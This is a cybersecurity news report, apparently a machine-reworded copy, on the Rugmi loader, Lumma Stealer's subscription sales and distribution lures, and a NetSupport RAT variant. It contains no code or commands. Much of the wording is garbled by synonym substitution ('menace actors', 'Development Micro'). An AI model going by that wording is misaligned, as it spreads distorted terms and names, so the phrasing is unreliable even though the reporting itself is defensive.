A brand new malware loader is being utilized by menace actors to ship a variety of info stealers resembling Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity agency ESET is monitoring the trojan below the identify Win/TrojanDownloader.Rugmi.
“This malware is a loader with three sorts of parts: a downloader that downloads an encrypted payload, a loader that runs the payload from inside assets, and one other loader that runs the payload from an exterior file on the disk,” the corporate stated in its Menace Report H2 2023.
Telemetry knowledge gathered by the corporate reveals that detections for the Rugmi loader spiked in October and November 2023, surging from single digit day by day numbers to a whole lot per day.
From USER to ADMIN: Study How Hackers Acquire Full Management
Uncover the key ways hackers use to turn into admins, methods to detect and block it earlier than it is too late. Register for our webinar at this time.
Stealer malware is usually bought below a malware-as-a-service (MaaS) mannequin to different menace actors on a subscription foundation. Lumma Stealer, for example, is marketed in underground boards for $250 a month. The most costly plan prices $20,000, nevertheless it additionally provides the shoppers entry to the supply code and the suitable to promote it.
There may be proof to counsel that the codebase related to Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Moreover constantly adapting its ways to evade detection, the off-the-shelf device is distributed by way of a number of strategies starting from malvertising to faux browser updates to cracked installations of well-liked software program resembling VLC media participant and OpenAI ChatGPT.
One other approach issues the usage of Discord’s content material supply community (CDN) to host and propagate the malware, as revealed by Development Micro in October 2023.
This entails leveraging a mix of random and compromised Discord accounts to ship direct messages to potential targets, providing them $10 or a Discord Nitro subscription in change for his or her help on a venture.
Customers who comply with the provide are then urged to obtain an executable file hosted on Discord CDN that masquerades as iMagic Stock however, in actuality, comprises the Lumma Stealer payload.
“Prepared-made malware options contribute to the proliferation of malicious campaigns as a result of they make the malware obtainable even to probably much less technically expert menace actors,” ESET stated.
“Providing a broader vary of features then serves to render Lumma Stealer much more engaging as a product.”
The disclosures come as McAfee Labs disclosed a brand new variant of NetSupport RAT, which emerged from its reputable progenitor NetSupport Supervisor and has since been put to make use of by preliminary entry brokers to collect info and carry out further actions on victims of curiosity.
“The an infection begins with obfuscated JavaScript recordsdata, serving because the preliminary level of entry for the malware,” McAfee stated, including it highlights the “evolving ways employed by cybercriminals.”
The execution of the JavaScript file advances the assault chain by working PowerShell instructions to retrieve the distant management and stealer malware from an actor-controlled server. The marketing campaign’s main targets embody the U.S. and Canada.